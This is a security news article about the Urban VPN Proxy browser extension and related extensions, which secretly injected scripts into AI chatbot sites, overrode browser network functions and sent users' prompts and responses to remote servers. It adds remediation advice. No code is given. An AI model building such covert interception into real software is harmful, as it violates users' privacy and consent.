Popular VPN Browser Extension Secretly Stole ChatGPT & AI Conversations
Dec 17, 2025
Overview
A widely installed browser VPN extension — marketed as a privacy and security tool — was found to be secretly intercepting and exfiltrating users’ private AI chatbot conversations from major services like ChatGPT, Google Gemini, Perplexity, Claude, and others, potentially affecting more than 8 million users worldwide. Security researchers discovered the covert behavior during a routine extension analysis, revealing a sophisticated data collection operation embedded in code pushed through an automatic update earlier this year.
Key Facts of the Incident
Category | Details |
|---|---|
Threat Type | Data exfiltration via browser extension |
Extension Name | Urban VPN Proxy (plus related extensions) |
Affected Platforms | Chrome, Microsoft Edge |
Install Base | ~6M on Chrome; ~1.3M on Edge; others included |
Start of Compromise | July 9, 2025 (version 5.5.0 release) |
Harvested Data | Full prompts, AI responses, general metadata |
Exfiltration Targets | Remote analytics servers |
Developer / Publisher | Urban Cyber Security Inc. (affiliated with BiScience) |
Badge / Trust Indicator | “Featured” badge on Chrome Web Store |
Discovery | Security research by Koi Security |
What Happened
Researchers analyzing browser extensions for hidden data collection capabilities discovered that Urban VPN Proxy, an extension with more than 6 million Chrome installs and a high star rating, injected hidden scripts into AI chat pages to intercept every interaction users had with AI platforms.
The malicious behavior was introduced quietly in version 5.5.0 of the extension in July 2025, deployed via automatic updates — meaning users were unaware the extension’s function had fundamentally changed.
Once the victim opens a supported AI site, platform-specific executor JavaScript (e.g., chatgpt.js, gemini.js) is injected directly into the page. These scripts then override key browser network APIs (like fetch() and XMLHttpRequest) to intercept AI prompts, AI responses, conversation IDs, timestamps, and session metadata before the browser renders them or secures them with TLS. The captured data is then transmitted to remote analytics endpoints controlled by the extension’s operator.
Scope of Data Collection
The extension did not target a single AI service — it monitored conversation data across ten major AI platforms, including:
OpenAI ChatGPT
Google Gemini
Anthropic Claude
Microsoft Copilot
Perplexity
DeepSeek
Grok (xAI)
Meta AI and others
The malicious harvesting behavior was also found embedded in seven other browser extensions from the same publisher (including 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker), raising the total affected user base to over 8 million across Chrome and Edge.
How the Data Exfiltration Worked
Silent Update — Users received version 5.5.0 via auto-update with hidden harvesting code.
Script Injection — When a supported AI URL is visited, the extension automatically injects a tailored script into the webpage.
Network API Override — The injected script overrides underlying browser request functions, enabling the extension to read raw API traffic before encryption and rendering.
Data Extraction — Prompts, AI responses, conversation metadata, timestamps, and session identifiers are extracted.
Exfiltration — Extracted data is forwarded to remote servers under control of the extension’s publisher.
Immediate Risk & Impact
Highly Sensitive Content Exposed — Chat sessions often contain medical questions, financial information, proprietary work details, intellectual property, personal dilemmas, and login session info, all of which could be collected and used without consent.
Enterprise Risk — Employees using AI tools behind corporate networks may inadvertently leak internal data through their browsers if the extension was installed.
Brand Trust Erosion — The extension carried a “Featured” badge, creating a false sense of legitimacy and trustability while performing data exfiltration.
What Users and Organizations Should Do
Uninstall the Extension Immediately — Removing it stops further data capture.
Audit Installed Browser Extensions — Block or remove unknown or high-risk extensions, especially free VPNs and privacy tools from unvetted publishers.
Assume AI Conversations Since July 2025 Are Compromised — Treat those interactions as potentially exposed.
Change Credentials — If sensitive data (like passwords or API keys) was entered into AI chats with the extension installed, rotate those credentials.
Enhance Browser Governance — Enforce policies that restrict third-party extension installs in enterprise environments.
Why This Matters
This incident highlights a growing attack surface rooted in browser extensions — especially those promising “privacy” — which can abuse granted permissions to bypass conventional security controls and exfiltrate user data covertly.
Browser extension trust signals like ratings and “Featured” badges do not guarantee safety, and malicious actors can embed harmful behavior into tools that millions rely on daily for privacy and security.
As AI tools become central to both personal and enterprise workflows, third-party components must be treated as part of the threat surface. Organizations should extend their threat models to include rogue extensions and enforce stricter controls over user-installed software.
Disclaimer: ClearPhish maintains a strict policy of not participating in the theft, distribution, or handling of stolen data or files. The platform does not engage in exfiltration, downloading, hosting, or reposting any illegally obtained information. Any responsibility or legal inquiries regarding the data should be directed solely at the responsible cybercriminals or attackers, as ClearPhish is not involved in these activities. We encourage parties affected by any breach to seek resolution through legal channels directly with the attackers responsible for such incidents.






